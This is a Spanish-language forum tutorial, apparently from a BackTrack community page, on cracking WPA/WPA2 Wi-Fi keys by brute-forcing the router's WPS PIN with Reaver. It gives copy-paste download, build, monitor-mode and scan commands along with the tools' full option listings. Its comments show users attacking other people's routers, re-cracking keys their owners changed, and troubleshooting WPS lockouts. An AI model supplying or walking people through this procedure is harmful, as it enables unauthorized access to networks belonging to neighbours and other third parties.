seccion creada para aportar temas , actualizaciones y tutoriales sobre el s.o backtrack 4 o 5 y gnu/linux en general

Ver más
  • 390 Miembros
  • 69 Temas
  • 166 Seguidores
  • 4

Reaver Tutorial [wpa/wpa2]

*Reaver lo podes descargar aqui http://code.google.com/p/reaver-wps/downloads/list
O escribir en la terminal wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz

Luego Descomprimimos tar -xvf reaver-1.4.tar.gz
Entramos en la carpeta cd reaver-1.4/src
Despues lo instalamos con ./configure
make
make install

Y listo ya lo tenemos instalado
Ahora a comprobar las redes vulnerables
* Ponemos nuestra targeta en modo monitor
airmon-ng start wlan0
Reaver Tutorial [wpa/wpa2]
*Para buscar las redes vulnerables escribimos
wash -i mon0
Reaver Tutorial [wpa/wpa2]
sintaxis de wash:
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<iface>              Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]   Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                  Channel to listen on [auto]
    -o, --out-file=<file>                Write data to file
    -n, --probes=<num>                   Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                      Daemonize wash
    -C, --ignore-fcs                     Ignore frame checksum errors
    -5, --5ghz                           Use 5GHz 802.11 channels
    -s, --scan                           Use scan mode
    -u, --survey                         Use survey mode [default]
    -h, --help                           Show help

Example:
    wash -i mon0


*Anotamos los datos del wifi como el Access Point(B4:5D:3F:XX:XX:XX y canal
y luego ejecutamos reaver
Ejemplo: Uso: reaver -i mon0 -b 00:1D:CE:6F:XX:XX -vv
Sintaxis de Reaver
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -a, --auto                      Auto detect the best advanced options for the target AP
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [5]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -n, --nack                      Target AP always sends a NACK [Auto]
    -w, --win7                      Mimic a Windows 7 registrar [False]

Example:
    reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv

En mi caso me he tardado desde tres horas en sacar la clave wpa hasta 98 horas
Aqui les dejo algunos screenshoots :

Reaver Tutorial [wpa/wpa2]
Reaver Tutorial [wpa/wpa2]
  • 4
  • 5Calificación
  • 8Seguidores
  • 93.104Visitas
  • 42Favoritos

31 comentarios

@MATONRAH Hace más de 2 años
se ve interesante, mas alrato lo calare y te comento como me fue carnal, muchas gracias por el tuto!
@bt4777 Hace más de 2 años
esta bien pero ami me sale warning failded associated me podrias ayudar por favor :S
@bt4777 Hace más de 2 años

briansx_404 dijo:Pero intentaste con wash -i mon0 ? aparecia el nombre de la red, puede que estes lejos del router o prueba agregando el canal
reaver -i mon0 -b 11:22:33:44:55:66 -c canal -vv


Saludos !



claro lo eh intentado en mon0 ya que wlan0 no podia entrar desde el principio desde airodump-ng y tube que probrar mon0

una duda mas esto es efectivo si la clave de defecto no esta cambiada?? un saludo!
@bt4777 Hace más de 2 años
a gracias entonces hoy mismo lo probare me ire de viaje y lo dejare en reaver q ver que pasa hahaha!

gracias por tu ayuda espero que mas adelante me ayuudes soy nuevo en esto jeje! un saludo!
@Pelillos93 Hace más de 2 años
Lo intenté probar una vez, pero no se cuantos paquetes había que capturar para que el reaver pudiese sacar la contraseña.

Saludos.
@poyoregio Hace más de 2 años
hola ya tengo el pin de un router d-link eso quiere decir que me evito hacer muchos pasos o hay que hacer todo desde el principio?, tambien tenia la clave wpa pero la cambiaron, con el pin que tengo puedo sacar la clave sin esperar tanto tiempo? y lo podria hacer desde wifiway 3.4 que ya trae reaver instalado?
@MATONRAH Hace más de 2 años
ni habia regresado a comentar jaja, funciona al 100 carnal, ya te deje R+1, muchas gracias
@bt4777 Hace más de 1 año
Hola bueno ami me funciono en un router WLAN_XXXX tengo otros por 69% 4% 6% 0.1% no los hago la verdad por que me da flojera pero funcionan

una pregunta mira hace tiempo tenia la clave de una red wifi WLAN_XXXX y la saque con un generador de claves de defecto y me fije que tenia el WPS activo entonces la cuestion seria como saber el pin del router por pongo la IP en el navegador y no puedo ver mas jjjej gracias y saludos a esta comu +10
@natilucha Hace más de 1 año
copado!! probando: GRACIAS!!
@natilucha Hace más de 1 año
problema: el backtrack 5 r2 desde live cd ya viene con el reaver 1.4, pero cuando lo ejecuto va bárbaro, pero luego comienza a tenr problemas de asociacion,
Associated with XX:XX:XX:XX:XX:XX
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX
[!] WARNING: Failed to associate with XX:XX:XX:XX:XX:XX
(...)
sera que el router se bloquea de mandar pines incorrectos?
@veguitah Hace más de 1 año
hola en donde puedo descargar el reaver para instalarlo porfa ayuda...
@benjanp Hace más de 1 año
@arnir Hace más de 1 año
Orale lo probare habia intentando el de John de Ripper pero no me funciono usando BT5, la verdad no se que tanta diferencia hay entre este y el John cual recomiendas (por supuesto para una WPA2)?
@arnir Hace más de 1 año
por cierto si es por fuerza bruta este metodo verdad? es que mi vecino me dijo en buen plan que si sacaba su contraseña me la podia quedar me amenazo con que tiene 25 caracteres y palabras en aleman ¿cuanto me tardare?
@briansx_404 Hace más de 1 año +1
1.- Es fuerza bruta pero no se necesita handshake, es una vulnerabildad por wps, primero tienes que comprobar si el router es vulnerable(no todos tienen wps habilitado)

2.- Se demora de 3horas - 1dia En este caso, usando reaver no importa cuantas letras,numeros tenga lo que busca es un codigo de 8 digitos que tienen los routers, mira Reaver Tutorial [wpa/wpa2] http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

3.- Si eres amigo de el puedes:
@Vidaure Hace más de 1 año
pero como puedo saber si el router a auditar tiene el wps activado ?
@arnir Hace 15 días
y si al ponerlo me sale
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
muchas veces?
@bt4777 Hace más de 1 año
aalguien podria hacer un tuto para instalar WPS-crackgui 1.2.4 por fas con gambas incluido
@briansx_404 Hace más de 1 año
sudo apt-get install gambas3 y sudo dpkg -i wpscrackgui
@pabheredia Hace más de 1 año
tengo una duda... como se usan todos esos comandos que aparecen ahi? ya descarge el reaver desde la pagina que pusiste pero ahora no se que hacer, disculpa la ignorancia
@briansx_404 Hace más de 1 año
Esta explicado paso a paso, solo tienes que copiar y pegar los comandos.
Existe otro S.O llamado xiaopan OS bajalo y http://www.youtube.com/watch?v=WOqz6sKB5KY
@pabheredia Hace más de 1 año
@briansx_404 ah ok gracias...
@JhonValdivia Hace más de 11 meses
hola men, por q cuando estoy usado el reaver, me sale el pin cambiándose a cada rato de la victima es normal o es defensa del router?
@JhonValdivia Hace más de 11 meses
cuando aparece el wps locked (SI) no se puede atacar a ese router? o normal se puede? o específicamente tiene q mostrar wps locked (NO) para poder sacar su clave
@chemiscal Hace más de 8 meses
No me aparece cd reaver-1.4/src
@briansx_404 Hace más de 8 meses +1
Escribe "ls" y ve que aparece, sino abre el explorador de archivos, descomprimes el archivo, entras a la carpeta, reaverxx , luego en la terminal escribes "cd " sin las comillas y con un espacio al final y luego arrastras la carpeta src que esta dentro de reaverxx y listo, aprietas enter .
Saludos.
@Tano_cs Hace más de 7 meses
no entiendo como instalarlo
@Ieoshafat Hace más de 4 meses
Estimados....saque una clave wpa2, luego la cambiaron junto con su essid, pero ahora hace poco intente denuevo sacar la pass, pero solo llego al 3.75%, me fije cambio hasta el canal lo salve y al otro dia al seguir no reconocia el canal alguien me podria ayudar...gracias.
@raek_17_09 Hace más de 3 meses
Cuanto tiempo tarda en sacar la clave? yo estuve 3 horas y seguia en 1,80%
@voggio Hace más de 2 meses
Buen aporte bro, tengo una duda we, como lo instalo? tengo BackTrack5 en una maquina virtual??? AYUDA!!!!
@arnir Hace 16 días
si wash -i mon0 no me muestra ninguna señal vulnerable que puedo hacer? por cierto estoy usando la targeta wifi interna de mi laptop, Me gustaria usar una alfa network pero no tengo idea de como la reconoceria en los comandos.
Tienes que ser miembro para responder en este tema